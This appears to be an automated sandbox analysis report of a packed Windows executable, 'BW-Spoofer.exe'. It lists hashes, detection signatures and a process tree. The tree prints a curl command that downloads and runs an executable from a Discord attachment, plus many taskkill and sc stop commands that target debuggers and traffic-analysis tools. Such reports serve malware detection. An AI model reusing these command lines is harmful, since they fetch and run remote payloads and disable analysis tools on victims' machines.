3706ed1a2a7e708ee1f495eafe95c03ef9d589850546ffe792a750d7498a45b6

Resubmissions

27/05/2023, 17:37

230527-v7b6csce89 8

27/05/2023, 17:36

27/05/2023, 17:33

27/05/2023, 17:32

27/05/2023, 17:31

27/05/2023, 17:20

27/05/2023, 17:11

Analysis

max time kernel
18s
max time network
102s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
27/05/2023, 17:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BW-Spoofer.exe
Size

5.6MB
MD5

67451b7db8bdcd28e6bd16a928794c6c
SHA1

c4e5685ecbe6793267f49ab72a0189fb5f35744a
SHA256

3706ed1a2a7e708ee1f495eafe95c03ef9d589850546ffe792a750d7498a45b6
SHA512

16d8134b87a6b26055f0628da186d842e46a19df83387b3b7272187cefdb1efe86286dd027da181a42dbd9edfbb5a77fcdce561af61be071c337810b117c392a
SSDEEP

98304:qeVN/VSp6wcY7hXQBkAZu+nBx21QNAz2rY6WQU9hUD69748C:q6m6GukCb21F2Vp6dtC

Score

8^/10

evasion vmprotect

Malware Config

Signatures

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 1 IoCs

pid	Process
3240	BW_Overlay_Handler.exe

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/memory/2872-135-0x00007FF670440000-0x00007FF670E0D000-memory.dmp	vmprotect

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2872	BW-Spoofer.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Media\BW_Overlay_Handler.exe	curl.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2032	sc.exe
2860	Process not Found
3392	Process not Found
3268	Process not Found
2152	Process not Found
3900	sc.exe
1980	sc.exe
828	sc.exe
4252	sc.exe
3648	Process not Found
2256	Process not Found
3652	Process not Found
332	sc.exe
1808	Process not Found
884	Process not Found
1824	sc.exe
2904	sc.exe
1668	sc.exe
456	sc.exe
956	Process not Found
2084	sc.exe
5096	Process not Found
2236	Process not Found
3828	Process not Found
4380	sc.exe
4528	sc.exe
756	Process not Found
4724	Process not Found
380	Process not Found
2952	sc.exe
5032	sc.exe
2000	sc.exe
4756	sc.exe
3992	Process not Found
5068	sc.exe
4624	sc.exe
3492	Process not Found
2000	Process not Found
3908	sc.exe
4168	sc.exe
4980	Process not Found
2860	Process not Found
5068	sc.exe
4196	Process not Found
3584	Process not Found
2904	sc.exe
2912	sc.exe
956	Process not Found
1108	sc.exe
1144	sc.exe
4300	sc.exe
404	sc.exe
3712	Process not Found
2060	Process not Found
4172	Process not Found
1560	Process not Found
2788	Process not Found
4944	Process not Found
2736	sc.exe
4484	sc.exe
4996	Process not Found
4344	Process not Found
3156	Process not Found
2884	Process not Found

Kills process with taskkill 64 IoCs

evasion

pid	Process
4844	Process not Found
3432	Process not Found
1208	taskkill.exe
1568	taskkill.exe
2740	taskkill.exe
916	taskkill.exe
3264	taskkill.exe
1560	Process not Found
2452	taskkill.exe
3272	taskkill.exe
1308	Process not Found
5100	Process not Found
4916	taskkill.exe
3816	taskkill.exe
2236	Process not Found
904	Process not Found
4068	Process not Found
2316	Process not Found
1404	taskkill.exe
540	taskkill.exe
4088	taskkill.exe
2360	Process not Found
1800	taskkill.exe
4912	Process not Found
3240	Process not Found
3252	Process not Found
3132	taskkill.exe
1676	taskkill.exe
4856	taskkill.exe
2428	taskkill.exe
2176	taskkill.exe
1008	taskkill.exe
1228	taskkill.exe
2340	taskkill.exe
3164	Process not Found
3580	Process not Found
5008	Process not Found
4796	Process not Found
1208	taskkill.exe
572	taskkill.exe
2532	taskkill.exe
1196	taskkill.exe
4568	Process not Found
4972	Process not Found
1472	taskkill.exe
4796	Process not Found
1092	Process not Found
2088	Process not Found
4540	Process not Found
1932	taskkill.exe
3900	Process not Found
3868	Process not Found
4908	Process not Found
4980	Process not Found
1780	Process not Found
3868	Process not Found
1976	Process not Found
3868	Process not Found
4244	Process not Found
2540	taskkill.exe
2764	taskkill.exe
916	taskkill.exe
572	Process not Found
4580	Process not Found

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2872	BW-Spoofer.exe
2872	BW-Spoofer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4372	taskkill.exe
Token: SeDebugPrivilege	4176	taskkill.exe
Token: SeDebugPrivilege	2020	taskkill.exe
Token: SeDebugPrivilege	2352	taskkill.exe
Token: SeDebugPrivilege	2736	taskkill.exe
Token: SeDebugPrivilege	3980	taskkill.exe
Token: SeDebugPrivilege	4856	cmd.exe
Token: SeDebugPrivilege	2452	taskkill.exe
Token: SeDebugPrivilege	4980	taskkill.exe
Token: SeDebugPrivilege	4620	taskkill.exe
Token: SeDebugPrivilege	948	taskkill.exe
Token: SeDebugPrivilege	4752	taskkill.exe
Token: SeDebugPrivilege	2180	cmd.exe
Token: SeDebugPrivilege	2192	taskkill.exe
Token: SeDebugPrivilege	2364	taskkill.exe
Token: SeDebugPrivilege	1092	taskkill.exe
Token: SeDebugPrivilege	5008	cmd.exe
Token: SeDebugPrivilege	5048	cmd.exe
Token: SeDebugPrivilege	1312	cmd.exe
Token: SeDebugPrivilege	3304	taskkill.exe
Token: SeDebugPrivilege	1836	cmd.exe
Token: SeDebugPrivilege	2904	sc.exe
Token: SeDebugPrivilege	4252	taskkill.exe
Token: SeDebugPrivilege	1932	cmd.exe
Token: SeDebugPrivilege	3984	cmd.exe
Token: SeDebugPrivilege	3908	cmd.exe
Token: SeDebugPrivilege	4772	taskkill.exe
Token: SeDebugPrivilege	3888	taskkill.exe
Token: SeDebugPrivilege	1824	cmd.exe
Token: SeDebugPrivilege	4120	cmd.exe
Token: SeDebugPrivilege	4376	taskkill.exe
Token: SeDebugPrivilege	752	taskkill.exe
Token: SeDebugPrivilege	4828	taskkill.exe
Token: SeDebugPrivilege	2452	cmd.exe
Token: SeDebugPrivilege	4980	taskkill.exe
Token: SeDebugPrivilege	1580	cmd.exe
Token: SeDebugPrivilege	4156	cmd.exe
Token: SeDebugPrivilege	4208	cmd.exe
Token: SeDebugPrivilege	1060	cmd.exe
Token: SeDebugPrivilege	2420	cmd.exe
Token: SeDebugPrivilege	3960	cmd.exe
Token: SeDebugPrivilege	2012	taskkill.exe
Token: SeDebugPrivilege	2092	taskkill.exe
Token: SeDebugPrivilege	4972	cmd.exe
Token: SeDebugPrivilege	4552	cmd.exe
Token: SeDebugPrivilege	5048	cmd.exe
Token: SeDebugPrivilege	4760	taskkill.exe
Token: SeDebugPrivilege	2408	taskkill.exe
Token: SeDebugPrivilege	3304	taskkill.exe
Token: SeDebugPrivilege	1560	cmd.exe
Token: SeDebugPrivilege	2904	sc.exe
Token: SeDebugPrivilege	2360	cmd.exe
Token: SeDebugPrivilege	4740	cmd.exe
Token: SeDebugPrivilege	3956	cmd.exe
Token: SeDebugPrivilege	3276	cmd.exe
Token: SeDebugPrivilege	4120	cmd.exe
Token: SeDebugPrivilege	1208	taskkill.exe
Token: SeDebugPrivilege	708	taskkill.exe
Token: SeDebugPrivilege	932	taskkill.exe
Token: SeDebugPrivilege	3488	cmd.exe
Token: SeDebugPrivilege	4980	Process not Found
Token: SeDebugPrivilege	2328	Process not Found
Token: SeDebugPrivilege	3556	cmd.exe
Token: SeDebugPrivilege	3272	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2872 wrote to memory of 1548	2872	BW-Spoofer.exe	85
PID 2872 wrote to memory of 1548	2872	BW-Spoofer.exe	85
PID 1548 wrote to memory of 2436	1548	cmd.exe	86
PID 1548 wrote to memory of 2436	1548	cmd.exe	86
PID 2872 wrote to memory of 756	2872	BW-Spoofer.exe	87
PID 2872 wrote to memory of 756	2872	BW-Spoofer.exe	87
PID 756 wrote to memory of 3240	756	cmd.exe	88
PID 756 wrote to memory of 3240	756	cmd.exe	88
PID 2872 wrote to memory of 3280	2872	BW-Spoofer.exe	90
PID 2872 wrote to memory of 3280	2872	BW-Spoofer.exe	90
PID 3280 wrote to memory of 2252	3280	cmd.exe	91
PID 3280 wrote to memory of 2252	3280	cmd.exe	91
PID 3280 wrote to memory of 380	3280	cmd.exe	92
PID 3280 wrote to memory of 380	3280	cmd.exe	92
PID 3280 wrote to memory of 3436	3280	cmd.exe	93
PID 3280 wrote to memory of 3436	3280	cmd.exe	93
PID 2872 wrote to memory of 4052	2872	BW-Spoofer.exe	94
PID 2872 wrote to memory of 4052	2872	BW-Spoofer.exe	94
PID 2872 wrote to memory of 2788	2872	BW-Spoofer.exe	95
PID 2872 wrote to memory of 2788	2872	BW-Spoofer.exe	95
PID 2872 wrote to memory of 500	2872	BW-Spoofer.exe	96
PID 2872 wrote to memory of 500	2872	BW-Spoofer.exe	96
PID 2872 wrote to memory of 4740	2872	BW-Spoofer.exe	97
PID 2872 wrote to memory of 4740	2872	BW-Spoofer.exe	97
PID 2872 wrote to memory of 1400	2872	BW-Spoofer.exe	102
PID 2872 wrote to memory of 1400	2872	BW-Spoofer.exe	102
PID 2872 wrote to memory of 4064	2872	BW-Spoofer.exe	99
PID 2872 wrote to memory of 4064	2872	BW-Spoofer.exe	99
PID 1400 wrote to memory of 4372	1400	cmd.exe	100
PID 1400 wrote to memory of 4372	1400	cmd.exe	100
PID 4064 wrote to memory of 4176	4064	cmd.exe	101
PID 4064 wrote to memory of 4176	4064	cmd.exe	101
PID 2872 wrote to memory of 1008	2872	BW-Spoofer.exe	98
PID 2872 wrote to memory of 1008	2872	BW-Spoofer.exe	98
PID 2872 wrote to memory of 1368	2872	BW-Spoofer.exe	103
PID 2872 wrote to memory of 1368	2872	BW-Spoofer.exe	103
PID 2872 wrote to memory of 2764	2872	BW-Spoofer.exe	104
PID 2872 wrote to memory of 2764	2872	BW-Spoofer.exe	104
PID 2872 wrote to memory of 1228	2872	BW-Spoofer.exe	105
PID 2872 wrote to memory of 1228	2872	BW-Spoofer.exe	105
PID 2872 wrote to memory of 4192	2872	BW-Spoofer.exe	106
PID 2872 wrote to memory of 4192	2872	BW-Spoofer.exe	106
PID 1228 wrote to memory of 2020	1228	cmd.exe	107
PID 1228 wrote to memory of 2020	1228	cmd.exe	107
PID 4192 wrote to memory of 2352	4192	cmd.exe	108
PID 4192 wrote to memory of 2352	4192	cmd.exe	108
PID 2872 wrote to memory of 2600	2872	BW-Spoofer.exe	168
PID 2872 wrote to memory of 2600	2872	BW-Spoofer.exe	168
PID 2600 wrote to memory of 2736	2600	cmd.exe	111
PID 2600 wrote to memory of 2736	2600	cmd.exe	111
PID 2872 wrote to memory of 4352	2872	BW-Spoofer.exe	170
PID 2872 wrote to memory of 4352	2872	BW-Spoofer.exe	170
PID 4352 wrote to memory of 3980	4352	cmd.exe	112
PID 4352 wrote to memory of 3980	4352	cmd.exe	112
PID 2872 wrote to memory of 3580	2872	BW-Spoofer.exe	113
PID 2872 wrote to memory of 3580	2872	BW-Spoofer.exe	113
PID 3580 wrote to memory of 4856	3580	cmd.exe	171
PID 3580 wrote to memory of 4856	3580	cmd.exe	171
PID 2872 wrote to memory of 1468	2872	BW-Spoofer.exe	115
PID 2872 wrote to memory of 1468	2872	BW-Spoofer.exe	115
PID 1468 wrote to memory of 2452	1468	cmd.exe	173
PID 1468 wrote to memory of 2452	1468	cmd.exe	173
PID 2872 wrote to memory of 3660	2872	BW-Spoofer.exe	176
PID 2872 wrote to memory of 3660	2872	BW-Spoofer.exe	176

C:\Users\Admin\AppData\Local\Temp\BW-Spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\BW-Spoofer.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1079064322992504864/1106278594893844601/BW_Redirect_Loader.exe --output C:\Windows\Media\BW_Overlay_Handler.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1548
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1079064322992504864/1106278594893844601/BW_Redirect_Loader.exe --output C:\Windows\Media\BW_Overlay_Handler.exe
    3⤵
    - Drops file in Windows directory
    PID:2436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Windows\Media\BW_Overlay_Handler.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:756
- - C:\Windows\Media\BW_Overlay_Handler.exe
    C:\Windows\Media\BW_Overlay_Handler.exe
    3⤵
    - Executes dropped EXE
    PID:3240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\BW-Spoofer.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3280
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\BW-Spoofer.exe" MD5
    3⤵
    PID:2252
- - C:\Windows\system32\find.exe
    find /i /v "md5"
    3⤵
    PID:380
- - C:\Windows\system32\find.exe
    find /i /v "certutil"
    3⤵
    PID:3436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c color 1
  2⤵
  PID:2788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c color 1
  2⤵
  PID:500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4064
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c color 1
  2⤵
  PID:1368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1228
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4192
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2600
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:4352
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3580
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:4856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1468
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:2452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3660
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:1980
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4784
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:1720
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4448
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:2500
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    PID:3904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2088
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2092
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4868
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3856
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:5008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2060
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:5048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4400
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:1312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1280
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:1144
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:1836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:892
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1612
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:828
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:1932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:208
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    PID:3992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:412
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:500
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:3908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2844
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4668
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4008
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2000
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:4120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4192
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2600
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4352
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4856
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1948
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3660
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
    3⤵
    PID:1580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4324
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4612
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:4208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4468
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1404
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:2420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2180
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3868
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    PID:2012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4932
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4232
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4528
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  PID:456
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    PID:5048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4380
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3948
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2408
- C:\Windows\system32\cmd.exe
